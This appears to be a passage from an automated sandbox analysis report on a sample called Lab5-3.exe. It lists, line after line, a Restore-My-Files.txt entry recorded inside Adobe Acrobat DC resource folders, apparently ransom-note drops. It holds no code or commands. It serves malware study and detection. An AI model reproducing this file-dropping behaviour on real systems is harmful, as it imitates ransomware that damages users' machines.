                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\whats_new\pt-br\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ca-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\cs-cz\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\da-dk\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\de-de\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\en-ae\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\en-gb\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\en-il\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\es-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\eu-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\fi-fi\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\fr-fr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\fr-ma\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\hr-hr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\hu-hu\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\it-it\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ja-jp\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ko-kr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\nb-no\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\nl-nl\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\pl-pl\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\pt-br\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ro-ro\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\root\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ru-ru\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\sk-sk\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\sl-si\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\sv-se\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\tr-tr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\uk-ua\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\zh-cn\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\zh-tw\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\videos\whats_new\de-de\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\videos\whats_new\en-us\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\videos\whats_new\fr-fr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\videos\whats_new\ja-jp\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\videos\whats_new\pt-br\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\css\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\images\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\images\themes\dark\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\ca-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\cs-cz\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\da-dk\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\de-de\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\en-ae\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\en-il\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\es-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\eu-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\fi-fi\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\fr-fr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\fr-ma\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\hr-hr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\hu-hu\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\it-it\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\ja-jp\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\ko-kr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\nb-no\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\nl-nl\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\pl-pl\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\pt-br\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\ro-ro\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\root\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\ru-ru\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\sk-sk\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\sl-si\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\sv-se\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\tr-tr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\uk-ua\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\zh-cn\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\zh-tw\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\plugins\rhp\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\css\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\images\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\images\themes\dark\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\ca-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\cs-cz\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\da-dk\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\de-de\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\en-ae\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\en-gb\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\en-il\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\es-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\eu-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\fi-fi\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\fr-fr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\fr-ma\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\hr-hr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\hu-hu\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\it-it\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\ja-jp\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\ko-kr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\nb-no\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\nl-nl\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\pl-pl\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\pt-br\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\ro-ro\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\root\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\ru-ru\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\sk-sk\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\sl-si\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\sv-se\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\tr-tr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\uk-ua\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\zh-cn\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\zh-tw\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\css\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ca-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\cs-cz\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\da-dk\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\de-de\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\en-ae\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\en-il\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\es-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\eu-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\fi-fi\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\fr-fr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\fr-ma\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\hr-hr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\hu-hu\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\it-it\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ja-jp\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ko-kr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\nb-no\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\nl-nl\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\pl-pl\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\pt-br\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ro-ro\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\root\Restore-My-Files.txtJump to behavior
